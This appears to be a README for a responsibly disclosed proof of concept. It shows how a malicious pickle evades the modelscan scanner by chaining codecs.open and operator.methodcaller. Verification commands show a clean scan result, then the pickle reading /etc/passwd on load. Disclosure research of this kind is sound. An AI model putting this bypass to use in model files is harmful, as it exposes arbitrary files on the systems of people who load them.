| --- |
| tags: |
| - security-research |
| - proof-of-concept |
| license: mit |
| --- |
| |
| # Modelscan Bypass PoC: codecs.open + operator.methodcaller |
|
|
| **Purpose:** Security research demonstrating a scanner bypass in ProtectAI modelscan. |
|
|
| ## Technique |
| - `codecs.open` is not in modelscan's unsafe_globals blocklist (only `builtins.open` is blocked) |
| - `operator.methodcaller` is not blocked (only `operator.attrgetter` is) |
| - Chain: `methodcaller('read')(codecs.open('/etc/passwd'))` → reads any file |
| |
| ## Verification |
| ```bash |
| pip install modelscan |
| modelscan scan -p model.pkl |
| # Output: "No issues found!" |
| |
| python3 -c "import pickle; print(pickle.load(open('model.pkl','rb'))[:100])" |
| # Output: contents of /etc/passwd |
| ``` |
| |
| ## Responsible Disclosure |
| Submitted to ProtectAI via Huntr MFV program. |
| |